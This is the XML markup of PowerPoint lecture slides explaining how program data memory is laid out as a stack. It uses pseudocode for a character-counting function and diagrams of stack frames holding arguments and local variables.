      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="1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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; length(s); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (s[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] == c) count = count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3: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4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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09C8EA4-060F-456A-A283-3092DB7E4D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8786082" y="2973639"/>
            <a:ext cx="2516986" cy="101295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Memory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FCA6FA0-3AD8-48B4-866C-1F38B8E5FCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4398682" y="3986597"/>
            <a:ext cx="4165600" cy="161335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23F83F5-6DA1-44DE-86FC-A1B5B043F75C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3523129" y="3735294"/>
            <a:ext cx="5041153" cy="180788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E37B643-6FA7-445A-AEBF-97A9B63EB3BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765335" y="2403839"/>
            <a:ext cx="4798947" cy="70720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1A7B796-2447-4B17-AD28-260E3EF3A2A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3578491" y="2757442"/>
            <a:ext cx="4985791" cy="60490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9842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9814F-383A-49AF-BD9C-46D085C47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56912-FF28-40EC-B564-0758CEA2E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Data memory is laid out using a specific data structure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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every function gets a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame created when a function is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains local, in scope variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame destroyed when the function exits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack grows downward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack frames also contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control flow information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More on this in a bit…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153899628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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Frame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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; length(s); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (s[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] == c) count = count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3: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4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4922428"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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AEAB490-5D15-4AF4-847B-A2A269CBC1C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3025997"/>
            <a:ext cx="2504140" cy="40246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“testing”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E1AEF61-2B46-4F3C-94FF-2BD8CB0AADCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2547879"/>
            <a:ext cx="2504140" cy="40246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“t”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BF1FFFF-D29F-47D9-AB0C-C55D1C748422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3982233"/>
            <a:ext cx="2504140" cy="40246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pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3504115"/>
            <a:ext cx="2504140" cy="40246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count</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Callout: Down Arrow 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A37B9C-3804-4F39-A5E4-56860F248E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8898965" y="5432612"/>
            <a:ext cx="2306915" cy="1326776"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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Stack grows downward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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7973090" y="2547879"/>
            <a:ext cx="621074" cy="880579"/>
            <a:chOff x="7973090" y="2547879"/>
            <a:chExt cx="621074" cy="880579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7732960" y="2788218"/>
              <a:ext cx="8803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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7971755" y="3469282"/>
            <a:ext cx="621074" cy="950453"/>
            <a:chOff x="7973090" y="2513046"/>
            <a:chExt cx="621074" cy="950453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
